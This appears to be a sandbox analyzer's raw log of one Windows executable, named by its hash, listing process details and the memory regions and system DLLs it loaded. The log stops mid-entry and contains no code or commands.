# Flog Txt Version 1 # Analyzer Version: 4.5.1 # Analyzer Build Date: May 9 2022 06:24:19 # Log Creation Date: 22.05.2022 11:21:51.780 Process: id = "1" image_name = "9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf.exe" page_root = "0x4ca97000" os_pid = "0x134c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x78c" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf.exe\" " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 121 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 122 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 123 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 124 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 125 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 126 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 127 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 128 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 129 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 130 start_va = 0x400000 end_va = 0x555fff monitored = 1 entry_point = 0x553b50 region_type = mapped_file name = "9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf.exe") Region: id = 131 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 132 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 133 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 134 start_va = 0x7fff0000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 135 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 136 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 275 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 276 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 277 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 278 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 279 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 280 start_va = 0x680000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 281 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 282 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 283 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 284 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 285 start_va = 0x560000 end_va = 0x61dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 286 start_va = 0x744b0000 end_va = 0x74541fff monitored = 0 entry_point = 0x744f0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 287 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 288 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 289 start_va = 0x74810000 end_va = 0x7488afff monitored = 0 entry_point = 0x7482e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 290 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 291 start_va = 0x620000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 292 start_va = 0x680000 end_va = 0x77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 293 start_va = 0x7c0000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 294 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 295 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 296 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 297 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 298 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 299 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 300 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 301 start_va = 0x753d0000 end_va = 0x754bafff monitored = 0 entry_point = 0x7540d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 302 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 303 start_va = 0x74660000 end_va = 0x746f1fff monitored = 0 entry_point = 0x74698cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 304 start_va = 0x75db0000 end_va = 0x771aefff monitored = 0 entry_point = 0x75f6b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 305 start_va = 0x77640000 end_va = 0x77676fff monitored = 0 entry_point = 0x77643b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 306 start_va = 0x74ed0000 end_va = 0x753c8fff monitored = 0 entry_point = 0x750d7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 307 start_va = 0x77680000 end_va = 0x776c4fff monitored = 0 entry_point = 0x7769de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 308 start_va = 0x77730000 end_va = 0x7773bfff monitored = 0 entry_point = 0x77733930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 309 start_va = 0x77390000 end_va = 0x7741cfff monitored = 0 entry_point = 0x773d9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 310 start_va = 0x74e70000 end_va = 0x74eb3fff monitored = 0 entry_point = 0x74e77410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 311 start_va = 0x77320000 end_va = 0x7732efff monitored = 0 entry_point = 0x77322e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 312 start_va = 0x8c0000 end_va = 0xa2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 313 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 314 start_va = 0xa30000 end_va = 0xbb7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 315 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 316 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 317 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 318 start_va = 0xbc0000 end_va = 0xd40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bc0000" filename = "" Region: id = 319 start_va = 0xd50000 end_va = 0x214ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d50000" filename = "" Region: id = 320 start_va = 0x70610000 end_va = 0x70684fff monitored = 0 entry_point = 0x70649a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 321 start_va = 0x8c0000 end_va = 0x99ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 322 start_va = 0xa20000 end_va = 0xa2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a20000" filename = "" Region: id = 323 start_va = 0x2150000 end_va = 0x2b4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002150000" filename = "" Region: id = 324 start_va = 0x2b50000 end_va = 0x2ca3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b50000" filename = "" Region: id = 325 start_va = 0x74200000 end_va = 0x7421afff monitored = 0 entry_point = 0x74209050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 326 start_va = 0x717f0000 end_va = 0x7196dfff monitored = 0 entry_point = 0x7186c630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 327 start_va = 0x720c0000 end_va = 0x7238afff monitored = 0 entry_point = 0x722fc4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 328 start_va = 0x75b90000 end_va = 0x75beefff monitored = 0 entry_point = 0x75b94af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 329 start_va = 0x74d00000 end_va = 0x74d12fff monitored = 0 entry_point = 0x74d01d20 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 330 start_va = 0x6f870000 end_va = 0x6f884fff monitored = 0 entry_point = 0x6f875210 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 331 start_va = 0x75830000 end_va = 0x759a7fff monitored = 0 entry_point = 0x75888a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 332 start_va = 0x754c0000 end_va = 0x754cdfff monitored = 0 entry_point = 0x754c5410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 333 start_va = 0x74800000 end_va = 0x74805fff monitored = 0 entry_point = 0x74801460 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 334 start_va = 0x780000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 335 start_va = 0x2cb0000 end_va = 0x2daffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002cb0000" filename = "" Region: id = 336 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 337 start_va = 0x74d20000 end_va = 0x74da3fff monitored = 0 entry_point = 0x74d46220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 338 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 339 start_va = 0x6f850000 end_va = 0x6f864fff monitored = 0 entry_point = 0x6f85e570 region_type = mapped_file name = "devenum.dll" filename = "\\Windows\\SysWOW64\\devenum.dll" (normalized: "c:\\windows\\syswow64\\devenum.dll") Region: id = 340 start_va = 0x6f820000 end_va = 0x6f843fff monitored = 0 entry_point = 0x6f824820 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\SysWOW64\\winmm.dll" (normalized: "c:\\windows\\syswow64\\winmm.dll") Region: id = 341 start_va = 0x6f7f0000 end_va = 0x6f812fff monitored = 0 entry_point = 0x6f7f8940 region_type = mapped_file name = "winmmbase.dll" filename = "\\Windows\\SysWOW64\\winmmbase.dll" (normalized: "c:\\windows\\syswow64\\winmmbase.dll") Region: id = 342 start_va = 0x660000 end_va = 0x663fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 343 start_va = 0x74890000 end_va = 0x74c9afff monitored = 0 entry_point = 0x748badf0 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 344 start_va = 0x705a0000 end_va = 0x705c7fff monitored = 0 entry_point = 0x705a7820 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 345 start_va = 0x72640000 end_va = 0x72661fff monitored = 0 entry_point = 0x726491f0 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 346 start_va = 0x75790000 end_va = 0x757d1fff monitored = 0 entry_point = 0x757a6f10 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 347 start_va = 0x6f7e0000 end_va = 0x6f7e8fff monitored = 0 entry_point = 0x6f7e29b0 region_type = mapped_file name = "msdmo.dll" filename = "\\Windows\\SysWOW64\\msdmo.dll" (normalized: "c:\\windows\\syswow64\\msdmo.dll") Region: id = 348 start_va = 0x6cd00000 end_va = 0x6cd13fff monitored = 0 entry_point = 0x6cd0e190 region_type = mapped_file name = "avicap32.dll" filename = "\\Windows\\SysWOW64\\avicap32.dll" (normalized: "c:\\windows\\syswow64\\avicap32.dll") Region: id = 349 start_va = 0x6ccd0000 end_va = 0x6ccf2fff monitored = 0 entry_point = 0x6cce33e0 region_type = mapped_file name = "msvfw32.dll" filename = "\\Windows\\SysWOW64\\msvfw32.dll" (normalized: "c:\\windows\\syswow64\\msvfw32.dll") Region: id = 350 start_va = 0x6cc30000 end_va = 0x6ccc1fff monitored = 0 entry_point = 0x6cc3dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 351 start_va = 0x2db0000 end_va = 0x2f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002db0000" filename = "" Region: id = 352 start_va = 0x8c0000 end_va = 0x8c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 353 start_va = 0x990000 end_va = 0x99ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 354 start_va = 0x8c0000 end_va = 0x97bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 355 start_va = 0x980000 end_va = 0x983fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000980000" filename = "" Region: id = 356 start_va = 0x9a0000 end_va = 0x9a3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 357 start_va = 0x9b0000 end_va = 0x9b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 358 start_va = 0x9c0000 end_va = 0x9c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009c0000" filename = "" Region: id = 359 start_va = 0x9d0000 end_va = 0x9d1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msvfw32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\msvfw32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\msvfw32.dll.mui") Region: id = 360 start_va = 0x9e0000 end_va = 0x9e2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "avicap32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\avicap32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\avicap32.dll.mui") Region: id = 361 start_va = 0x2db0000 end_va = 0x2e2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002db0000" filename = "" Region: id = 362 start_va = 0x2f50000 end_va = 0x2f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 363 start_va = 0x9d0000 end_va = 0x9d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 364 start_va = 0x9e0000 end_va = 0x9e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 365 start_va = 0x9f0000 end_va = 0x9f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 366 start_va = 0xa00000 end_va = 0xa00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 367 start_va = 0xa10000 end_va = 0xa10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 368 start_va = 0x2e30000 end_va = 0x2e30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e30000" filename = "" Region: id = 369 start_va = 0x2e40000 end_va = 0x2e40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e40000" filename = "" Region: id = 370 start_va = 0x9d0000 end_va = 0x9d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 371 start_va = 0x2e40000 end_va = 0x2e40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e40000" filename = "" Region: id = 372 start_va = 0x9e0000 end_va = 0x9e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 373 start_va = 0x2e40000 end_va = 0x2e40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e40000" filename = "" Region: id = 374 start_va = 0x9f0000 end_va = 0x9f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 375 start_va = 0x2e40000 end_va = 0x2e40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e40000" filename = "" Region: id = 376 start_va = 0xa00000 end_va = 0xa00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 377 start_va = 0x2e40000 end_va = 0x2e40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e40000" filename = "" Region: id = 378 start_va = 0xa10000 end_va = 0xa10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 379 start_va = 0x2e40000 end_va = 0x2e40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e40000" filename = "" Region: id = 380 start_va = 0x2e30000 end_va = 0x2e30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e30000" filename = "" Region: id = 381 start_va = 0x2e40000 end_va = 0x3176fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 382 start_va = 0x3180000 end_va = 0x3180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003180000" filename = "" Region: id = 383 start_va = 0x3190000 end_va = 0x3190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003190000" filename = "" Region: id = 384 start_va = 0x3180000 end_va = 0x3180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003180000" filename = "" Region: id = 385 start_va = 0x31a0000 end_va = 0x31a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031a0000" filename = "" Region: id = 386 start_va = 0x3180000 end_va = 0x3180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003180000" filename = "" Region: id = 387 start_va = 0x31b0000 end_va = 0x31b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031b0000" filename = "" Region: id = 388 start_va = 0x31c0000 end_va = 0x31c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031c0000" filename = "" Region: id = 389 start_va = 0x3180000 end_va = 0x3180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003180000" filename = "" Region: id = 390 start_va = 0x31a0000 end_va = 0x31a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031a0000" filename = "" Region: id = 391 start_va = 0x3180000 end_va = 0x3180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003180000" filename = "" Region: id = 392 start_va = 0x31b0000 end_va = 0x31b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031b0000" filename = "" Region: id = 393 start_va = 0x3180000 end_va = 0x3180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003180000" filename = "" Region: id = 394 start_va = 0x31a0000 end_va = 0x31a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031a0000" filename = "" Region: id = 395 start_va = 0x3180000 end_va = 0x3180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003180000" filename = "" Region: id = 396 start_va = 0x31d0000 end_va = 0x31d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031d0000" filename = "" Region: id = 397 start_va = 0x3180000 end_va = 0x3180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003180000" filename = "" Region: id = 398 start_va = 0x31b0000 end_va = 0x31b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031b0000" filename = "" Region: id = 399 start_va = 0x3180000 end_va = 0x3180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003180000" filename = "" Region: id = 400 start_va = 0x31a0000 end_va = 0x31a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031a0000" filename = "" Region: id = 401 start_va = 0x3180000 end_va = 0x3180fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003180000" filename = "" Region: id = 402 start_va = 0x3180000 end_va = 0x3180fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003180000" filename = "" Region: id = 403 start_va = 0x31c0000 end_va = 0x31c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000031c0000" filename = "" Region: id = 404 start_va = 0x31e0000 end_va = 0x31e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031e0000" filename = "" Region: id = 